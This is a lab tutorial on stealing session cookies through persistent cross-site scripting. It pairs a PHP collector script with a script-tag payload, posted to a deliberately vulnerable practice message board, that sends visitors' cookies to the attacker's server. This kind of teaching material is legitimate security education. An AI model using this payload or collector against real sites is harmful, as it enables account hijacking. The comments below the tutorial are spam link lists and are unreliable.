Stealing Cookies with Persistent XSS
What You Need
- A Backtrack 5 machine, real or virtual. I used a BackTrack 5 R2 virtual machine.
Purpose
If a website has a Persistent XSS vulnerability, you can inject code and attack other users. We'll use this attack to steal a cookie.This sort of attack is used commonly to gain access to another person's acount on webmail or social network accounts.
Starting Apache
On your BackTrack Linux machine, at the#> prompt, enter these commands followed by the Enter key:You should see the local address 0.0.0.0:80 in a State of LISTEN, as shown below:service apache2 restartnetstat -an | more
Testing PHP
At the#> prompt, enter these commands followed by the Enter key:In nano, type in the code shown below:cd /var/wwwnano test.php
<?php phpinfo(); ?>
Your screen should look like this:
Press
Ctrl+X, then press Y, then press the Enter key. This saves your file.From the menu bar in the top left of the BackTrack desktop, click Applications, Internet, Firefox Web Browser.
In the Firefox address bar, enter
localhost/test.php and then press the Enter key. You should see a PHP configuration page, as shown below:
This verifies that Apache and PHP are running correctly.
If PHP doesn't work, try re-extracting BackTrack from the original 7-zip file.
Writing a Cookie-Storage PHP Script
The script we will use does these things:- When a user sends an HTTP GET request to this script with a parameter c, that parameter is stored in a file
- It will also store two other values: the IP address and the referring URL
- It will save this information in a file named cookies.html in the /tmp folder
- It will then return to the original page, so that the user has no idea that anything unusual has happened On your BackTrack linux machine, in a Terminal window, execute this command:
In nano, enter this script:nano /var/www/steal.php
as shown below:<?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date = date("j F, Y, g:i a"); $referer = getenv ('HTTP_REFERER'); $out = 'Cookie: ' . $cookie . "\n"; $out = $out . 'IP: ' . $ip . "\n"; $out = $out . 'Date: ' . $date . "\n"; $out = $out . 'Referer: ' . $referer . "\n\n"; $fp = fopen('/tmp/cookies.html', 'a'); fwrite($fp, $out); fclose($fp); header ("Location: http://games.samsclass.info"); ?> <HTML></HTML>
Save the file with Ctrl+X, Y, Enter.
Finding your Backtrack Linux Server's IP Address
Make sure your BackTrack Linux virtual machine is using Bridged networking, not NAT.If necessary, renew the IP address with the dhclient command.
In Backtrack, in Firefox, execute this command:
Find your IP address and make a note of it.ifconfigTesting the Cookie-Storage Script
On your host machine, (NOT the Backtrack machine), open a Web browser and go to this URL, replacing the IP address with the IP address of your Backtrack machine:
If the PHP script is working correctly, your browser will forward to games.samsclass.info, as shown below:http://192.168.5.36/steal.php?c=test123
If you made any errors typing in the script, you will see an error message telling you which line has a problem. Fix those problems and don't proceed to the next section until the PHP script is working.
Viewing the Stolen Data
In Backtrack, in Firefox, execute this command:
You should see the stolen data, as shown below:cat /tmp/cookies.html
Viewing the Vulnerable Message Board
On your host system, open a Web browser and go to this page:http://games.samsclass.info/vulnphp/
This is a simple message board, using your name as an authentication cookie.In the "User ID Page", enter your name in the box, as shown below. (Don't use the literal string "YOUR NAME"--instead, use your own real name.
Click the Enter button.
On the next page, if any comments appear, click the "Erase Comments" button.
Enter this comment, replacing the IP address with the IP address of your BackTrack Linux server:
<script> document.location="http://192.168.5.36/steal.php?c=" + document.cookie </script>
Click the "Post Comment" button.
The page just stole your cookie, and it will continue to steal cookies from everyone who views it until someone clicks the "Erase Comments" button.
Viewing the Stolen Data
In Backtrack, in Firefox, execute this command:
You should see the stolen data, with your name in it, as shown below:cat /tmp/cookies.html
10 comments
https://bayanlarsitesi.com/
ReplyManisa
Denizli
Malatya
Çankırı
HUVR
adıyaman
Replysakarya
yalova
tekirdağ
amasya
DUQR
adana evden eve nakliyat
Replyafyon evden eve nakliyat
istanbul evden eve nakliyat
burdur evden eve nakliyat
gümüşhane evden eve nakliyat
Z7DHC
A44C2
ReplyHatay Lojistik
Kırşehir Evden Eve Nakliyat
Bolu Evden Eve Nakliyat
Kırıkkale Lojistik
Muş Parça Eşya Taşıma
0B94A
ReplyArg Coin Hangi Borsada
Lbank Güvenilir mi
Karabük Şehirler Arası Nakliyat
Gümüşhane Lojistik
Adana Şehir İçi Nakliyat
Niğde Evden Eve Nakliyat
Sincan Fayans Ustası
Tokat Şehir İçi Nakliyat
Keep Coin Hangi Borsada
supreme hoodie
Replyoff white t shirt
palm angels clothing
jordan shoes
nike sb
kd 12
hermes outlet
spongebob kyrie 5
jordan outlet
curry 8
26989
ReplyCoin Nasıl Üretilir
Kripto Para Nedir
Loop Network Coin Hangi Borsada
Tumblr Beğeni Hilesi
Binance Referans Kodu
Tumblr Takipçi Satın Al
Discord Sunucu Üyesi Satın Al
Coin Çıkarma Siteleri
Bitcoin Nasıl Üretilir
0D55C
ReplyThreads Yeniden Paylaş Hilesi
Facebook Takipçi Hilesi
Coin Madenciliği Siteleri
Referans Kimliği Nedir
Clubhouse Takipçi Hilesi
Bitcoin Çıkarma Siteleri
Kripto Para Oynama
Facebook Sayfa Beğeni Hilesi
Soundcloud Takipçi Satın Al
38AE1
Replyyearn
ledger wallet
poocoin
arbitrum
avax
eigenlayer
raydium
uwu lend
aave
9EA52
ReplyPamukkale
Gaziemir
Kovancılar
Arıcak
Aziziye
Tuzlukçu
Oğuzeli
Dikmen
Demirköy
Post a Comment